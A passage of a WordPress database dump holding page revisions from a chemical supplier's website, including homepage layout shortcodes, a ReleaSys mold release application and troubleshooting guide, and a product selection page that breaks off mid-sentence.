link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4144" bg_size="orginal" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" position_x="100" position_y="0"]\n\n[button text="Industrial &amp; medical coatings" size="small" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\n\n[text_box width="100" position_x="0" position_y="0" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Custom Solutions</h3>\n<p>Custom-built release agent, specialty coating or unique formulation. Our engineering department can design a solution for your application needs.</p>\n\n[/featured_box]\n\n[/col]\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/featured_box]\n\n[/col]\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Large Inventory</h3>\n<p>Our four fully stocked USA & Canadian locations allow us to ensure swift delivery. Vast KRYTOX inventory of most grades at bulk pricing.</p>\n\n[/featured_box]\n\n[/col]\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/featured_box]\n\n[/col]\n[col]\n\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle" link="https://www.miller-stephenson.com/releasys-release-agent/"]\n\n[text_box width="47" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys™ </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" color="white" style="outline" radius="82" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-29 16:36:17', '2017-05-29 16:36:17', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4316, 0, '2017-05-29 18:10:57', '2017-05-29 18:10:57', '', '', '', 'publish', 'closed', 'closed', '', '4316', '', '', '2017-05-29 18:10:57', '2017-05-29 18:10:57', '', 0, 'https://www.miller-stephenson.com/nf_sub/4316/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4317, 0, '2017-05-30 09:25:54', '2017-05-30 09:25:54', '', '', '', 'publish', 'closed', 'closed', '', '4317', '', '', '2017-05-30 09:25:54', '2017-05-30 09:25:54', '', 0, 'https://www.miller-stephenson.com/nf_sub/4317/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4318, 2, '2017-05-30 12:33:16', '2017-05-30 12:33:16', '[ux_banner_grid height="500" depth="3" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4144" bg_size="orginal" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" position_x="100" position_y="0"]\n\n[button text="Industrial &amp; medical coatings" size="small" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\n\n[text_box width="100" position_x="0" position_y="0" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Custom Solutions</h3>\n<p>Custom-built mold release agent, specialty coating or unique formulation. Our engineering department can design a solution for your application needs.</p>\n\n[/featured_box]\n\n[/col]\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/featured_box]\n\n[/col]\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Large Inventory</h3>\n<p>Our four fully stocked USA & Canadian locations allow us to ensure swift delivery. Vast KRYTOX inventory of most grades at bulk pricing.</p>\n\n[/featured_box]\n\n[/col]\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/featured_box]\n\n[/col]\n[col]\n\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle" link="https://www.miller-stephenson.com/releasys-release-agent/"]\n\n[text_box width="47" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys™ </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" color="white" style="outline" radius="82" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-30 12:33:16', '2017-05-30 12:33:16', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4319, 0, '2017-05-30 12:44:48', '2017-05-30 12:44:48', '', '', '', 'publish', 'closed', 'closed', '', '4319', '', '', '2017-05-30 12:44:48', '2017-05-30 12:44:48', '', 0, 'https://www.miller-stephenson.com/nf_sub/4319/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4320, 3, '2017-05-30 12:52:24', '2017-05-30 12:52:24', '<h1 data-canvas-width="370.56179999999995"><strong>Mold Release Application Guide -  ReleaSys™ </strong></h1>\r\n<div data-canvas-width="370.56179999999995">Miller-Stephenson has generated a mold release application guide to help aid customers with the proper surface preparation and application of its new semi-permanent release agents. Semi-permanent mold release agents are state of the art release agent systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive<strong> <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys Semi-Permanent release agents</a></strong> represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and Troubleshooting common molding issues guide to help aid our customers in applying ReleaSys.</p>\r\n\r\n<h4><span style="text-decoration: underline; font-size: 115%;"><strong>Surface-Preparation</strong></span></h4>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agents or contaminates are critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n\r\n<h4><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Application to Mold Surface</span></strong></span></h4>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  Aerosolization minimizes over-application and facilitates the development of a uniform, thin film on the molding surface. Miller-Stephenson offers aerosolized cans of its ReleaSys product line (ie: <strong>ReleaSys <a href="https://www.miller-stephenson.com/product/water-based-ptfe-release-agent/">82</a>, <a href="https://www.miller-stephenson.com/product/rubber-mold-release-agents/">85</a>, <a href="https://www.miller-stephenson.com/product/water-based-mold-release-agent/">88</a>, and <a href="https://www.miller-stephenson.com/product/release-agents/">89</a></strong>) which have been optimized to deliver consistent application and coverage. Our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set the HVLP gun to appropriate pressure; a typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzle sizes can vary between 0.6 mm to 1.0 mm.  Spray 8-12 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (1-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.\r\n<ul>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ul>\r\n</li>\r\n</ol>\r\n<h4 style="text-align: justify;"><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Re-application</span></strong></span></h4>\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding, it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\nFor further assistance please contact our <span style="text-decoration: underline;"><strong><a href="https://www.miller-stephenson.com/tech-support/">Technical Service Department</a></strong></span>. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely given the diversity and specialization within this field. Please see our Troubleshooting guide below if your are experiencing any issues using our ReleaSys product line.\r\n<h4 style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Common Molding Issues</strong></span></span></h4>\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="241"><span style="text-decoration: underline; font-size: 120%;"><strong>Problem</strong></span></td>\r\n<td style="text-align: center;" width="517"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: center;" width="680"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 105%;"><strong>Complete <span style="background-color: #ffffff;">failure </span>to obtain release</strong></span></td>\r\n<td><span style="color: #ff0000;">›</span><span style="font-size: 105%;">Improperly cured ReleaSys</span></td>\r\n<td><span style="font-size: 105%;">• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 105%;"><span style="color: #ff0000;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</span></td>\r\n<td><span style="font-size: 105%;">• Thoroughly clean mold with bead blasting followed by cleaning with a solvent or high pH detergent.  Reapply ReleaSys.</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 105%;"><span style="color: #ff0000;">›</span> Phase-separation of ReleaSys as a result of over agitation or mixing</span></td>\r\n<td><span style="font-size: 105%;">• Examine ReleaSys; If separation occurred replace with fresh material</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between passes.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release and/or small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong>To learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong></li>\r\n 	<li><strong>If you require any further technical or application support please contact our technical staff</strong></li>\r\n 	<li><strong>Mold Release Application Guide</strong></li>\r\n</ul>\r\n&nbsp;', 'Mold Release Application Guide - Troubleshooting Guide - ReleaSys™', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2017-05-30 12:52:24', '2017-05-30 12:52:24', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4321, 2, '2017-05-30 15:02:09', '2017-05-30 15:02:09', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\r\n\r\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\r\n\r\n[text_box text_color="dark" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\r\n\r\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However, it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application-specific sections below.</p>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[divider align="center" width="500px"]\r\n\r\n<p><a name="advanced composites"></a></p>\r\n<center>\r\n[button text="ADVANCED COMPOSITES" size="small" link="#advanced composites"]\r\n\r\n[button text="ROTATIONAL PLASTIC" size="small" link="#rotational plastics"]\r\n\r\n[button text="POLYURETHANE" size="small" link="#polyurethane"]\r\n\r\n[button text="RUBBER-SILICONE-ELASTOMER" size="small" link="#rubber"]\r\n\r\n[button text="INJECTION PLASTICS" size="small" link="#injection"]\r\n\r\n[button text="FIBERGLASS" size="small" link="#fiber"]\r\n\r\n[button text="PRECAST / REINFORCED CONCRETE" size="small" link="#concrete"]\r\n\r\n[button text="CUSTOM FORMULATIONS" size="small" link="#custom"]\r\n</center>\r\n\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4351" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Advanced Composites</h2>\r\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\r\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\r\n\r\n\r\n[/col]\r\n<p><a name="rotational plastics"></a></p>\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4360" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rotational Plastics (Rotomolding)</h2>\r\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\r\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\r\n\r\n<p><a name="polyurethane"></a></p>\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4366" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Polyurethane-TPU</h2>\r\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver a superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high-performance chemistry adheres tenaciously to mold surfaces such as aluminum, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\r\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\r\n\r\n\r\n[/col]\r\n<p><a name="rubber"></a></p>\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4387" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rubber / Silicone / Elastomers</h2>\r\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\r\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\r\n\r\n<p><a name="injection"></a></p>\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4332" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Injection Plastics Mold Release</h2>\r\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\r\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\r\n\r\n<p><a name="fiber"></a></p>\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4337" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Fiberglass Mold Release</h2>\r\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament 